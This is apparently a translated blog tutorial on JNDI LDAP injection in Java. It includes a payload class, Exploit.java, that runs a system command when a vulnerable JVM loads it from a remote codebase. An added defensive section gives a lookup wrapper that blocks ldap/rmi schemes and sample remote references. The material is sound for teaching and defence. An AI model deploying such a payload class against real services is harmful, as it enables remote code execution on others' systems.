Previously I analysed fastjson and jackson; both rely on JNDI injection, i.e. the LDAP/RMI pseudo-protocols.
JNDI RMI basics and the analysis of low fastjson versions: https://www.cnblogs.com/piaomiaohongchen/p/14780351.html
Today we focus on JNDI LDAP injection; RMI is left for later.
A picture is worth a thousand words:
The picture is stolen from threezh1:
Looking at this diagram, the whole flow feels very clear.
Testing the LDAP attack: JDK version chosen: jdk8u73, test environment: Mac OS
Download archive of every jdk8-series release: https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
Malicious class: Exploit.java:
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.io.Serializable;
import java.util.Hashtable;

// Payload class served by the attacker's LDAP/RMI server. The vulnerable JVM
// loads it from the remote codebase and instantiates it, so the constructor
// is what runs on the target (here: launch Calculator on Mac OS).
public class Exploit implements ObjectFactory, Serializable {
    public Exploit() {
        try {
            Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    // Local test: instantiating the class triggers the constructor.
    public static void main(String[] args) {
        Exploit exploit = new Exploit();
    }

    // Implemented only so the class is a valid ObjectFactory for the JNDI
    // Reference; the returned object is irrelevant, the constructor already ran.
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                    Hashtable<?, ?> environment) throws Exception {
        return null;
    }
}
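For the defensive side of the same mechanism, here is an added example that is not part of the original post: a lookup wrapper that refuses any JNDI name carrying a remote scheme (ldap/ldaps/rmi/iiop/corbaname), only permits local java:comp/env names, and switches off remote codebase trust for the LDAP and RMI providers. The two trustURLCodebase system properties are real JDK properties (they default to false from 8u191 onward, which is why the post tests on 8u73); the class name SafeJndiLookup, the scheme list and the sample strings are my own assumptions.

```java
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.util.Locale;

// Hypothetical hardening wrapper around InitialContext.lookup (not from the original post).
public class SafeJndiLookup {

    // Schemes that would make JNDI resolve a Reference from a remote server.
    private static final String[] REMOTE_SCHEMES = {
        "ldap:", "ldaps:", "rmi:", "iiop:", "corbaname:"
    };

    static {
        // Explicitly disable loading factory classes from a remote codebase, so that
        // even an attacker-controlled Reference cannot pull in a class like Exploit.
        // (Default is already "false" on 8u191+, older JDKs such as 8u73 default to "true".)
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "false");
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "false");
    }

    // True when the name starts with a scheme that points at a remote naming service.
    public static boolean isRemoteReference(String name) {
        if (name == null) {
            return false;
        }
        String lower = name.trim().toLowerCase(Locale.ROOT);
        for (String scheme : REMOTE_SCHEMES) {
            if (lower.startsWith(scheme)) {
                return true;
            }
        }
        return false;
    }

    // Only allow-listed local names reach the real lookup; everything else is rejected.
    public static Object lookup(String name) throws NamingException {
        if (isRemoteReference(name)) {
            throw new NamingException("refusing remote JNDI reference: " + name);
        }
        if (name == null || !name.startsWith("java:comp/env/")) {
            throw new NamingException("only java:comp/env/ names are permitted: " + name);
        }
        return new InitialContext().lookup(name);
    }

    public static void main(String[] args) {
        // Constructed sample inputs; neither host nor resource exists.
        String[] samples = {
            "ldap://example.invalid:1389/Exploit",
            "RMI://example.invalid:1099/Exploit",
            "java:comp/env/jdbc/appDb"
        };
        for (String s : samples) {
            System.out.println(s + " -> remote=" + isRemoteReference(s));
        }
    }
}
```

Setting the properties in a static initialiser is a belt-and-braces measure for applications that cannot control their JVM command line; the name allow-list is the part that actually closes the injection path, because the scheme check alone can be bypassed on providers that accept other URL forms.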